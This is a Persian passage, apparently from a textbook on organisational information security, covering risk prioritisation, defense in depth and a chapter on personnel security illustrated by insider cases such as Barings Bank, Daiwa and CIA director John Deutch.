ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﺎ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠﻪ ﻛﺮﺩ )ﻣﺜﻞ ﺍﻳﻨﻜﻪ ﻣﺪﻳﺮ ﺷﻤﺎ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﺩ ﻛـﻪ
ﺗﻤﺎﻡ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻳﻮﻧﻴﻜﺲ ﺭﺍ ﺗﺒﺪﻳﻞ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻌﺮﻭﻓﺘـﺮ ﻧﻤﺎﻳـﺪ!(.
ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺪﻳﺮﻳﺖ ﺧﻮﺏ ،ﺩﺍﻧﺴﺘﻦ ﭼﻴﺰﻫﺎﻳﻲ ﺍﺳﺖ ﻛـﻪ ﺩﺭ ﻣـﻮﺭﺩ
ﺁﻧﻬﺎ ﻧﮕﺮﺍﻧﻲ ﺩﺍﺭﻳﺪ ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﻫﺮﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺎﺋﻞ ﺗـﺎ ﭼـﻪ
ﺍﻧﺪﺍﺯﻩ ﻧﮕﺮﺍﻥﻛﻨﻨﺪﻩ ﻫﺴﺘﻨﺪ.
ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﭽﻪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺯ ﺁﻥ ﺣﻔﺎﻇﺖ ﻛﻨﻴﺪ
ﻭ ﻫﺰﻳﻨﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻠﻔـﺎﺕ ﺁﻥ
ﺑﺪﻫﻴﺪ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺗﺮﻣﻴﻢ ﺿﺮﺭﻫﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﻳـﻚ
ﺭﺧﺪﺍﺩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺁﻧﮕﺎﻩ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﺟﺪﻭﻝ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﻳﻚ
ﻓﻬﺮﺳﺖ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱﺷﺪﻩ ﺍﺯ ﺍﻛﺜـﺮ ﻗﺮﻳـﺐ ﺑـﻪ ﺍﺗﻔـﺎﻕ ﻧﻴﺎﺯﻫـﺎﻱ
ﺣﻴﺎﺗﻲ ،ﺗﺼﻤﻴﻢ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﻭ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﺑﮕﻴﺮﻳﺪ .ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺗﺤﻠﻴـﻞ ﻋـﻼﻭﻩ ﺑـﺮ
ﺭﺍﻳﺎﻧﻪﻫﺎ ،ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﻧﻴﺰ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻳﺪ؛
ﻭ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴـﺪ ﻛـﻪ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ،ﺍﺗـﺼﺎﻻﺕ ﺷـﺒﻜﻪ،
ﭘﺎﻳﺎﻧﻪﻫﺎ ،ﻭ ﻣـﺪﺍﺭﻙ ﺷـﻤﺎ ﻫﻤـﻪ ﺍﺟﺰﺍﻳـﻲ ﺍﺯ ﺳﻴـﺴﺘﻢ ﻫـﺴﺘﻨﺪ ﻭ
ﻫﺮﻳﻚ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﺭﺍ ﺑـﻪ ﻛـﻞ ﺳﻴـﺴﺘﻢ ﻭﺍﺭﺩ ﺁﻭﺭﻧـﺪ.
ﺳﻼﻣﺖ ﻛﺎﺭﻛﻨﺎﻥ ،ﺳﺎﺧﺘﻤﺎﻥ ﺷﺮﻛﺖ ،ﻭ ﺍﻋﺘﺒﺎﺭ ﻭ ﻭﺟﻬﺔ ﻋﻤـﻮﻣﻲ
ﺁﻥ ﻧﻴــﺰ ﺑــﺴﻴﺎﺭ ﺣــﺎﺋﺰ ﺍﻫﻤﻴــﺖ ﻫــﺴﺘﻨﺪ ﻭ ﺑﺎﻳــﺪ ﺩﺭ ﻣﺤﺎﺳــﺒﺎﺕ
ﻃﺮﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ.
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻳﻨﻜﻪ ﺍﻧﺴﺎﻥ ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘﺔ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﻧﻴـﺴﺖ
ﻛﻪ ﺑﺎﻳﺪ ﺣﻔﺎﻇﺖ ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﺩﻳﮕـﺮ ﺭﺍ ﺑـﻪ ﻓﺮﺍﻣﻮﺷـﻲ ﺳـﭙﺮﺩ.
ﺍﻧﺴﺎﻥ ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﺍﺳﺖ ﺍﻣﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻣـﻮﺩﻡ
ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﺪﺍﺭﺩ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﺍﺯ ﻣﺘﻘﺎﻋﺪ ﻛﺮﺩﻥ ﻳﻚ ﻛﺎﺭﻣﻨـﺪ
ﻛﻠﻴﺪﻱ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺭﺷﻮﻩ ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺮﺟـﺎ ﻛـﻪ ﺍﻣﻜـﺎﻥ ﺁﻥ
ﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ
ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺪﺍﻓﻌ ﹺ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﻢ ﻭ ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑـﺎ ﺁﻣـﻮﺯﺵ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ
ﻛﺎﺭﻛﻨﺎﻥ ﺑﻬﺒﻮﺩ ﺑﺨﺸﻴﻢ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﻪ ﺩﻓﺎﻉ ﺩﺭ ﻋﻤـﻖ ﺗﻜﻴـﻪ
ﻣﻲﻛﻨـﻴﻢ :ﻣﺮﺍﺣـﻞ ﭼﻨﺪﮔﺎﻧـﺔ ﺩﻓـﺎﻋﻲ ﻣﺜـﻞ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﻜـﺎﺭ
ﻣﻲﺑﺮﻳﻢ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﻧﺎﻣﻮﻓﻖ ﺑﻮﺩﻥ ﻳﻚ ﻻﻳـﻪ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺩﻓـﺎﻉ
ﻻﺯﻡ ،ﺩﭼﺎﺭ ﺯﻳﺎﻧﻬﺎﻱ ﺍﺳﺎﺳﻲ ﻧﺸﻮﻳﻢ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺳﻴـﺴﺘﻢ
ﺟﺎﻳﮕﺰﻳﻦ UPSﻣﻲﺧﺮﻳﻢ؛ ﻳﺎ ﻫﺮﭼﻨﺪ ﺭﻭﻱ ﺩﺭ ﺳـﺎﺧﺘﻤﺎﻥ ﻳـﻚ
ﻗﻔﻞ ﻣﺴﺘﺤﻜﻢ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ،ﻗﻔـﻞ ﺟﺪﺍﮔﺎﻧـﻪﺍﻱ ﺭﻭﻱ ﺩﺭ ﻭﺭﻭﺩﻱ
ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﻗﺮﺍﺭ ﻣـﻲﺩﻫـﻴﻢ .ﺣﻘﻴﻘـﺖ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﻣﻬـﺎﺟﻢ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮ ﺍﻳﻦ ﺗﺮﻛﻴﺒﻬﺎ ﻧﻴﺰ ﻏﻠﺒﻪ ﻛﻨﺪ ،ﻭﻟـﻲ ﻣـﺎ ﻫﺰﻳﻨـﺔ ﺍﻧﺠـﺎﻡ
ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺍﻭ ﺑﺎﻻ ﻣﻲﺑﺮﻳﻢ؛ ﺁﻧﻘﺪﺭ ﺑﺎﻻ ﻛﻪ ﺷﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﻢ ﺍﻭ ﺭﺍ
ﻗﺎﻧﻊ ﻛﻨﻴﻢ ﻛﻪ ﻋﺒﻮﺭ ﺍﺯ ﻣﻮﺍﻧﻊ ﺳﻴﺴﺘﻢ ﻣﺎ ﺑﻪ ﺩﺭﺩﺳﺮﻫﺎﻳﻲ ﻛﻪ ﺩﺍﺭﺩ
ﻧﻤﻲﺍﺭﺯﺩ .ﺩﺭ ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻣﻴﺪﻭﺍﺭ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﻧﻘـﺪﺭ
ﺳــﺮﻋﺖ ﻣﻬــﺎﺟﻢ ﺭﺍ ﻛــﺎﻫﺶ ﺩﺍﺩﻩ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﭘــﻴﺶ ﺍﺯ ﺍﻳﻨﻜــﻪ
ﺩﺍﺭﺍﺋﻴﻬﺎﻱ ﻣﻬﻢ ﺍﺯ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺷـﻮﻧﺪ ،ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﻭ
ﻫﺸﺪﺍﺭ ،ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺟﺮﻳﺎﻥ ﻧﻔﻮﺫ ﺁﮔﺎﻩ ﻛﻨﻨﺪ.
١٥٧
١٥٩
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
•
ﺟﺎﻥ ﺩﺍﭺ ٩٧ﺭﺋـﻴﺲ CIAﺩﺭ ﺯﻣـﺎﻥ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ
ﺑﻴﻞ ﻛﻠﻴﻨﺘﻮﻥ ،ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﺩﻭﻟﺘـﻲ ﺭﺍ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ
ﺑﻪ ﺧﺎﻧﻪﺍﺵ ﻣﻲﺑـﺮﺩ ﻭ ﺩﺭ ﺁﻧﺠـﺎ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﺫﺧﻴـﺮﻩ
ﻣﻲﻛﺮﺩ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﻱ "ﻃﺒﻘﻪﺑﻨﺪﻱ ﻧﺸﺪﻩ" ﭘﻴﻜﺮﺑﻨـﺪﻱ
ﺷﺪﻩ ﺑﻮﺩﻧﺪ .ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺍﻃﻼﻋـﺎﺕ ﻃﺒﻘـﻪ ﺑﻨـﺪﻱﺷـﺪﻩ ﺩﺭ
ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻗــﺮﺍﺭ ﺩﺍﺷــﺘﻨﺪ ،ﺍﺯ ﺁﻧﻬــﺎ ﺑــﺮﺍﻱ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺒﺘـﺬﻝ ﻭ ﻏﻴـﺮ ﺍﺧﻼﻗـﻲ ﻫـﻢ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣــﻲﺷــﺪ -ﭘﺎﻳﮕﺎﻫﻬــﺎﻳﻲ ﻛــﻪ ﻣﻤﻜــﻦ ﺑــﻮﺩ ﻫــﻢ ﺍﺯ
ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﻋﻤــﻮﻣﻲ ﻭ ﻣﻨﺘــﺸﺮﺷﺪﻩ ﻭ ﻫــﻢ ﺍﺯ
ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻭ ﺍﻓﺸﺎﻧـﺸﺪﻩ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﺑـﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺮﺍﺟﻌﻪﻛﻨﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜـﻪ
ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻣﻘﺮﺭﺍﺕ ﻭ ﻗﻮﺍﻧﻴﻦ ﻣﺘﻌﺪﺩﻱ ﺗﻮﺳﻂ ﺩﺍﭺ ﺯﻳـﺮ
ﭘﺎ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ،ﻫﻴﭻ ﺍﻗـﺪﺍﻡ ﻋﻤﻠـﻲ ﻋﻠﻴـﻪ ﺍﻭ ﺍﻧﺠـﺎﻡ
ﻧﺸﺪ ﻭ ﺩﺭ ﺁﺧﺮﻳﻦ ﺭﻭﺯ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ ﻛﻠﻴﻨﺘـﻮﻥ ﻧﻴـﺰ
ﻣﻮﺭﺩ ﻋﻔﻮ ﻭﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺖ.
ﻓﺼﻞ ﺷﺸﻢ
ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ
ﻛﻠﻴﺎﺕ
ﺍﻳﻦ ﻓﺼﻞ ﺑﻄﻮﺭ ﺧﻼﺻﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﺑﺮﺭﺳـﻲ
ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﺯ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﻧﺸﺄﺕ ﻣﻲ ﮔﻴﺮﻧﺪ .ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ
ﻛﺎﺭﻛﻨﺎﻥ ﺍﺯ ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺍﺧﺮﺍﺝ ﮔﺮﻓﺘﻪ ﺗﺎ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔـﺎﻫﻲ ﺁﻧـﺎﻥ
ﻧﻘﺸﻲ ﺣﻴﺎﺗﻲ ﺩﺭ ﻋﻤﻠﻜﺮﺩ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ ﻭ ﺩﻓﺎﻋﻲ ﺳﺎﺯﻣﺎﻥ ﺩﺍﺭﻧﺪ.
ﻣﺨﺎﻃﺮﺍﺕ ﻧﺸﺄﺕﮔﺮﻓﺘﻪ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ؛
ﺗﻬﺪﻳﺪﻱ ﭘﻨﻬﺎﻥ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ
ﭼﻨﺪ ﻓﻘﺮﻩ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺧﺒﺮﺳﺎﺯﻱ ﻛـﻪ ﻃـﻲ ﭼﻨـﺪ ﺳـﺎﻝ ﺍﺧﻴـﺮ
ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ:
•
ﻧﻴــﻚ ﻟﻴــﺴﻮﻥ ٨٩ﻳــﻚ ﺗــﺎﺟﺮ ﺳ ـﺮﻣﺎﻳﻪﮔــﺬﺍﺭ ﺩﺭ ﺑﺎﻧــﻚ
ﺑﺎﺭﻳﻨﮕﺰ ٩٠ﺷﻌﺒﺔ ﺳﻨﮕﺎﭘﻮﺭ ،ﻭ ﺗﻮﺷﻴﻬﺎﻳﺪ ﺍﻳﮕﻮﭼﻲ ٩١ﺍﺯ ﺩﻓﺘﺮ
ﻧﻴﻮﻳﻮﺭﻙ ﺑﺎﻧﻚ ﺩﺍﻳﻮﺍ ٩٢ﻫﺮ ﺩﻭ ﺍﻗﺪﺍﻡ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ
ﭘﺮ ﻣﺨﺎﻃﺮﻩﺍﻱ ﻛﺮﺩﻧﺪ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻣﻘﺎﺩﻳﺮ
ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﺯ ﺳﺮﻣﺎﻳﺔ ﺑﺎﻧﻜﻬﺎﻳﺸﺎﻥ ﺷﺪ؛ ﺍﻣﺎ ﺁﻧﻬﺎ ﺑﺠـﺎﻱ
ﭘــﺬﻳﺮﺵ ﺷﻜــﺴﺖ ،ﺳــﻮﺍﺑﻖ ﺣــﺴﺎﺑﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺭﺍ
ﻝ ﺑـﺎﺯ ﻫـﻢ
ﻼ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﭘـﻮ ﹺ
ﺩﺳﺘﻜﺎﺭﻱ ﻛﺮﺩﻧﺪ ﻭ ﻋﻤ ﹰ
ﺑﻴﺸﺘﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺟﺒﺮﺍﻥ ﺿﺮﺭﻫﺎﻱ ﻗﺒﻠﻲ ﻭﺍﺭﺩ ﺍﻳـﻦ ﻗﻤـﺎﺭ
ﻧﻤﻮﺩﻧﺪ؛ ﻭ ﺳﺮﺍﻧﺠﺎﻡ ﻧﻴﺰ ﺑﻌﺪ ﺍﺯ ﻭﺍﺭﺩ ﺁﻭﺭﺩﻥ ﺑﻴﺶ ﺍﺯ ﻳـﻚ
ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺯﻳﺎﻥ ﺑـﻪ ﻫﺮﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﺩﻭ ﺑﺎﻧـﻚ ﻣـﻮﺭﺩ
ﺷﻨﺎﺳﺎﻳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ .ﺩﺭ ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﺍﻗـﺪﺍﻣﺎﺕ ﺑﺎﻧـﻚ
ﺑﺎﺭﻳﻨﮕﺰ ﻣﺠﺒﻮﺭ ﺑﻪ ﺍﻋﻼﻡ ﻭﺭﺷﻜﺴﺘﮕﻲ ﺷﺪ ﻭ ﺑﺎﻧﻚ ﺩﺍﻳـﻮﺍ
ﻧﻴﺰ ﻣﺠﻮﺯ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺭﺍ
ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩ.
Nick Leeson
Barings Bank
Toshihide Iguchi
Daiwa
89
90
91
92
ﺍﮔﺮ ﺷﻤﺎ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻭ ﺳﺎﻳﺮ ﻗﺎﻧﻮﻥﺷﻜﻨﻴﻬﺎ ﻭ ﺗﺨﻠﻔﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ
ﻃﻲ ﭼﻨﺪ ﺩﻫﺔ ﺍﺧﻴﺮ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ،ﻳﻚ ﻭﻳﮋﮔﻲ ﻣﺸﺘﺮﻙ ﺩﺭ ﺁﻧﻬـﺎ
ﻣﻲﺑﻴﻨﻴﺪ :ﻫﻤﺔ ﺁﻧﻬﺎ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺑﻮﻗﻮﻉ ﭘﻴﻮﺳﺘﻪﺍﻧﺪ .ﻋﻮﺍﻣﻞ ﻧﻔـﻮﺫ،
ﺍﻓﺮﺍﺩ ﺑﻮﺩﻩﺍﻧﺪ؛ ﻭﻳﺮﻭﺳـﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺍﻓـﺮﺍﺩ ﻧﻮﺷـﺘﻪ ﺑﻮﺩﻧـﺪ؛ ﻭ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﻧﻴﺰ ﺍﻓﺮﺍﺩ ﺩﺯﺩﻳﺪﻩ ﺑﻮﺩﻧﺪ.
ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ" ﻋﺒﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﻫﻤـﺔ ﻣﻮﺍﺭﺩﻳﻜـﻪ ﻣﺮﺑـﻮﻁ ﺑـﻪ
ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲ ﺷﻮﺩ :ﺍﺳﺘﺨﺪﺍﻡ ،ﺁﻣﻮﺯﺵ ،ﻛﻨﺘﺮﻝ ﺭﻓﺘﺎﺭ ،ﻭ ﮔﺎﻫﻲ ﻧﻴﺰ
ﺍﺧﺮﺍﺝ .ﺁﻣﺎﺭ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺩﺳﺘﺔ ﻣﺮﺗﻜﺒﻴﻦ ﺟـﺮﺍﺋ ﹺﻢ
ﺳﻨﮕﻴﻦ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺴﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻳﺎ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻗـﺎﻧﻮﻧﻲ ﺑـﻪ
ﺩﺍﺩﻩﻫﺎ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ ﻭ ﻳـﺎ ﺩﺭ ﮔﺬﺷـﺘﺔ ﻧﺰﺩﻳـﻚ ﺍﺯ ﺁﻥ ﺑﺮﺧـﻮﺭﺩﺍﺭ
Aldrich Ames
Janathon Pollard
Robert Hanson
Robert Walker
John Deutch
93
94
95
96
97
ﺑﺨﺶ ﺳﻮﻡ
•
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﻌﻀﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺍﻓـﺮﺍﺩ ﻋﻠﻴـﺮﻏﻢ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﺗﺄﻳﻴﺪﻳﻪﻫﺎﻱ ﻣﻌﺘﺒ ﹺﺮ ﺍﻣﻨﻴﺘـﻲ ﺍﺯ FBI ،CIA
ﻭ ﺍﺭﺗﺶ ،ﺍﻃﻼﻋـﺎﺕ ﻃﺒﻘـﻪﺑﻨـﺪﻱ ﺷـﺪﻩﺍﻱ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ
ﺭﻭﺳﻴﻪ ﻭ ﺍﺳﺮﺍﺋﻴﻞ ﻗﺮﺍﺭ ﻣﻲﺩﺍﺩﻧﺪ )ﻣﺜﻞ ﺁﻟﺪﺭﻳﭻ ﺍﻳﻤﺰ ،٩٣ﺟﺎﻧﺎﺗﺎﻥ
ﭘﻮﻻﺭﺩ ،٩٤ﺭﺍﺑﺮﺕ ﻫﺎﻧﺴﻮﻥ ٩٥ﻭ ﺭﺍﺑﺮﺕ ﻭﺍﻛﺮ .(٩٦ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻋﻠﻴﺮﻏﻢ
ﻭﺟﻮﺩ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﺘﻌﺪﺩ ﺍﻣﻨﻴﺘﻲ ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ
ﻣﺨـﺮﺏ ﺟﺎﺳﻮﺳــﻲ -ﺑﻌـﻀﹰﺎ ﺗــﺎ ﺑـﻴﺶ ﺍﺯ ﻳــﻚ ﺩﻫــﻪ -
ﺑﻮﺩﻩﺍﻧﺪ.
١٦٠
ﺑﻮﺩﻩﺍﻧﺪ .ﺑﻌﻀﻲ ﻣﻄﺎﻟﻌـﺎﺕ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺑـﻴﺶ ﺍﺯ %۸۰
ﺭﺧﺪﺍﺩﻫﺎ ﺗﻮﺳﻂ ﭼﻨﻴﻦ ﺍﻓﺮﺍﺩﻱ ﺭﺥ ﻣـﻲﺩﻫـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻗـﺴﻤﺖ
ﻣﻬﻤﻲ ﺍﺯ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺏ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺍﺩﺍﺭﺓ ﻛﺎﺭﻛﻨﺎﻥ
ﺑﺎ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻃﺒﻘﻪﺑﻨﺪﻱﺷﺪﻩ.
ﺍﻓﺮﺍﺩ ﺑﻪ ﺩﻭ ﺻﻮﺭﺕ ﺩﺭ ﺑﺮﻭﺯ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺗـﺄﺛﻴﺮ
ﺩﺍﺭﻧﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑـﺎ ﺩﻧﺒـﺎﻝ ﻧﻜـﺮﺩﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ،ﺑـﻪ
ﻓﺮﺍﻣﻮﺷﻲ ﺳﭙﺮﺩﻥ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ،ﻭ ﻣﻄﻠـﻊ ﻧﺒـﻮﺩﻥ ﺍﺯ ﻧﺘـﺎﻳﺞ
ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ،ﺳﻬﻮﹰﺍ ﺑﻪ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ .ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺁﮔﺎﻫﺎﻧـﻪ ﻛﻨﺘﺮﻟﻬـﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ﺭﺍ
ﺯﻳﺮ ﭘﺎ ﻣﻲﮔﺬﺍﺭﻧﺪ ﺗﺎ ﺑﻪ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ﻛﻤﻚ ﻛﺮﺩﻩ ﺑﺎﺷـﻨﺪ ﻳـﺎ
ﻼ ﺍﺷـﺎﺭﻩ
ﺧﻮﺩ ﺑﺘﻨﻬﺎﻳﻲ ﺑﺎﻋﺚ ﻭﻗﻮﻉ ﺁﻥ ﺷﻮﻧﺪ .ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﻗـﺒ ﹰ
